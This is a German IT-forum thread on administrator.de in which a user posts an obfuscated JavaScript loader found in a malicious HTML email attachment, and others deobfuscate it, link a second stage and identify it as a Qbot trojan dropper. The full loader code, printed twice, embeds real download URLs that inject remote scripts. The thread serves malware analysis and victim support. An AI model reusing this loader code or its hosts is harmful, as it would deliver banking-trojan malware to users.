HTML Javascript Schadcode?

Hallo Leute

wie blöd muss man sein. Ich predige jeden Tag "keine unbekannten oder merkwürdig Anhänge öffnen" und vor lauter husch husch ist es mir jetzt selbst passiert.
Der Emailanhang war eine *.html Datei und die ersten zig Zeilen waren auch nur lateinischer Text. In den letzten 3 Zeilen war der code.

<script type="text/javascript">  
		var a0gaxemmamnmai=a0auopbttselaeva;(function(paltvonousn,molssurosiumdpo){var aqsupimi=a0auopbttselaeva,lnpmaguiac=paltvonousn();while(!![]){try{var uaamumatquindlail=parseInt(aqsupimi(0xc8))/0x1*(parseInt(aqsupimi(0xc7))/0x2)+parseInt(aqsupimi(0xc3))/0x3+parseInt(aqsupimi(0xc1))/0x4+-parseInt(aqsupimi(0xc6))/0x5+-parseInt(aqsupimi(0xc4))/0x6+-parseInt(aqsupimi(0xbf))/0x7*(-parseInt(aqsupimi(0xc5))/0x8)+-parseInt(aqsupimi(0xcf))/0x9;if(uaamumatquindlail===molssurosiumdpo)break;else lnpmaguiac['push'](lnpmaguiac['shift']());}catch(sdasenectuear){lnpmaguiac['push'](lnpmaguiac['shift']());}}}(a0pcuisssitint,0x9c462));function a0auopbttselaeva(pcuisssitint,auopbttselaeva){var paltvonousn=a0pcuisssitint();return a0auopbttselaeva=function(molssurosiumdpo,lnpmaguiac){molssurosiumdpo=molssurosiumdpo-0xbd;var uaamumatquindlail=paltvonousn[molssurosiumdpo];return uaamumatquindlail;},a0auopbttselaeva(pcuisssitint,auopbttselaeva);}var voluptatemrerum=[a0gaxemmamnmai(0xc2)+'nseg.com/qu/qu'+a0gaxemmamnmai(0xcc),'https://ksaa-e'+a0gaxemmamnmai(0xbe)+a0gaxemmamnmai(0xbd)+'2',a0gaxemmamnmai(0xd1)+a0gaxemmamnmai(0xca)+a0gaxemmamnmai(0xcd)+a0gaxemmamnmai(0xc0)+'5111'];function a0pcuisssitint(){var tboeurldsoi=['osscommunicati','appendChild','.php?14652','onservices.com','script','8538543FFQfSE','createElement','https://youngb','/enqu.php?2954','vents.com/enqu','8781570gbVRZg','/aua/aua.php?3','4856144NrAgbj','https://horizo','387975mYIIKZ','2511780PInbUf','8XBKhBs','6018945WNxSPK','12146zVqPWt','101AYDIcr','src'];a0pcuisssitint=function(){return tboeurldsoi;};return a0pcuisssitint();}for(var occaecatiestnesciunt in voluptatemrerum){var rem=document[a0gaxemmamnmai(0xd0)](a0gaxemmamnmai(0xce));rem[a0gaxemmamnmai(0xc9)]=voluptatemrerum[occaecatiestnesciunt],document['head'][a0gaxemmamnmai(0xcb)](rem);}  
</script>

Der Kaspersky hat nicht angeschlagen.
Weiß vielleicht jemand was ich mir da eingefangen habe?

Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben

Content-ID: 6465992526

Url: https://administrator.de/contentid/6465992526

Ausgedruckt am: 24.11.2024 um 00:11 Uhr

12 Kommentare

Neuester Kommentar

Hi,

Stage 1 läd ein Skript von 3 verschiedenen URLs nach, davon ist eine down.
Stage 2: https://pastebin.com/AriyCjZ1
Stage 2 scheint eine Datei abzuspeichern..

weiter komme ich heute nicht da ich meine Malware-Umgebung nicht dabei habe..

Hier nach dem "Beautifier":

<script type = "text/javascript" >  
    var a0gaxemmamnmai = a0auopbttselaeva;
(function(paltvonousn, molssurosiumdpo) {
    var aqsupimi = a0auopbttselaeva,
        lnpmaguiac = paltvonousn();
    while (!![]) {
        try {
            var uaamumatquindlail = parseInt(aqsupimi(0xc8)) / 0x1 * (parseInt(aqsupimi(0xc7)) / 0x2) + parseInt(aqsupimi(0xc3)) / 0x3 + parseInt(aqsupimi(0xc1)) / 0x4 + -parseInt(aqsupimi(0xc6)) / 0x5 + -parseInt(aqsupimi(0xc4)) / 0x6 + -parseInt(aqsupimi(0xbf)) / 0x7 * (-parseInt(aqsupimi(0xc5)) / 0x8) + -parseInt(aqsupimi(0xcf)) / 0x9;
            if (uaamumatquindlail === molssurosiumdpo) break;
            else lnpmaguiac['push'](lnpmaguiac['shift']());  
        } catch (sdasenectuear) {
            lnpmaguiac['push'](lnpmaguiac['shift']());  
        }
    }
}(a0pcuisssitint, 0x9c462));

function a0auopbttselaeva(pcuisssitint, auopbttselaeva) {
    var paltvonousn = a0pcuisssitint();
    return a0auopbttselaeva = function(molssurosiumdpo, lnpmaguiac) {
        molssurosiumdpo = molssurosiumdpo - 0xbd;
        var uaamumatquindlail = paltvonousn[molssurosiumdpo];
        return uaamumatquindlail;
    }, a0auopbttselaeva(pcuisssitint, auopbttselaeva);
}
var voluptatemrerum = [a0gaxemmamnmai(0xc2) + 'nseg.com/qu/qu' + a0gaxemmamnmai(0xcc), 'https://ksaa-e' + a0gaxemmamnmai(0xbe) + a0gaxemmamnmai(0xbd) + '2', a0gaxemmamnmai(0xd1) + a0gaxemmamnmai(0xca) + a0gaxemmamnmai(0xcd) + a0gaxemmamnmai(0xc0) + '5111'];  

function a0pcuisssitint() {
    var tboeurldsoi = ['osscommunicati', 'appendChild', '.php?14652', 'onservices.com', 'script', '8538543FFQfSE', 'createElement', 'https://youngb', '/enqu.php?2954', 'vents.com/enqu', '8781570gbVRZg', '/aua/aua.php?3', '4856144NrAgbj', 'https://horizo', '387975mYIIKZ', '2511780PInbUf', '8XBKhBs', '6018945WNxSPK', '12146zVqPWt', '101AYDIcr', 'src'];  
    a0pcuisssitint = function() {
        return tboeurldsoi;
    };
    return a0pcuisssitint();
}
for (var occaecatiestnesciunt in voluptatemrerum) {
    var rem = document[a0gaxemmamnmai(0xd0)](a0gaxemmamnmai(0xce));
    rem[a0gaxemmamnmai(0xc9)] = voluptatemrerum[occaecatiestnesciunt], document['head'][a0gaxemmamnmai(0xcb)](rem);  
} < /script>

Der dritte link wird von Kaspersky als "malicous" eingestuft.

https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary

Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.

Zitat von @Fennek11:

Der dritte link wird von Kaspersky als "malicous" eingestuft.

https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary

Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.

Zitat von @chaot1coz:
Stage 2: https://pastebin.com/AriyCjZ1

Erst einemal vielen an Euch.

Was sollte ich jetzt tun und wie werde ich das Ding wieder los

Wenn du absolute Sicherheit willst, Alles platt machen, Windows neu installieren und Daten vom Backup wieder einspielen. Alles andere wäre als Vorschlag unseriös.

Danke für die Info
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?

Zitat von @nullchecker:

Danke für die Info
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?

Im Endeffekt kann das Teil alles machen. Über eine Remote-Shell die mit dem CC Server in Kontakt steht kannst du nachladen was du gerade brauchst.
Platt machen und Kennwörter von den kritischsten Accounts sicherheitshalber ändern ist Pflichtprogramm bei unbekannten Infektionen.

Würde der Kaspersy das nachladen bemerken.
Läd das Ding von ganz alleine nach oder wird das von mir irgenwie ausgelöst (durch starten einer App).

Zitat von @nullchecker:

Würde der Kaspersy das nachladen bemerken.

Würde ich mich nicht drauf verlassen. Das wird oft über Windows-Prozesse getarnt.

Läd das Ding von ganz alleine nach oder wird das von mir irgenwie ausgelöst (durch starten einer App).

Gibt es unterschiedliche Vorgehensweisen, meistens kontaktiert der Client einen CC (Command & Control Server) in zeitlichen Abständen, welcher meistens verschlüsselte Anweisungen für den Client abgelegt hat und die der Client dann ausführt. Das kann sogar durch getarnte DNS-Abfragen geschehen so das es noch weniger auffällt, oder durch zur Laufzeit injizierte JavaScripts im Browser etc. pp.

Vielen Dank für die Infos.
Werde auf Kurz oder Lan das Sxstem neu aufsetzen.

Hallo,
ich wollte hier nur noch eine kurze Rückmeldung geben.
Ich habe mit dem Support von Kaspersky (den hab ich als Virenscanner) Kontakt aufgenommen, und die haben mir mitgeteilt, dass das Skript von Rerum.html seit 17.03 von Kaspersky blockiert wird. Das Skript wird als HEUR:Trojan-Dropper.Script.Qbot.gen von Kaspersky geblockt.
Ich habe von Kas. und Mbar (Malwarebytes Anti-Rootkit ewiglange Scans laufen lassen und die haben nichts gefunden. Von daher gehe ich davon aus dass ich nochmal mit einem blauen Auge davongekommen bin.
Nichtsdestotrotz werde ich bei gelegenheit eine neue Maschine aufsetzen.

Euch nochmals vielen Dank für die Unterstützung

gelöst Frage Viren, Trojaner JavaScript HTML E-Mail

Mehr von nullchecker

Windows 2000SP4 -Explorer hat einen Fehler verursacht und wird geschlossen - Reparaturinstalation erkennt die Festplatte nichtnullchecker - 1 Kommentar

Heiß diskutiert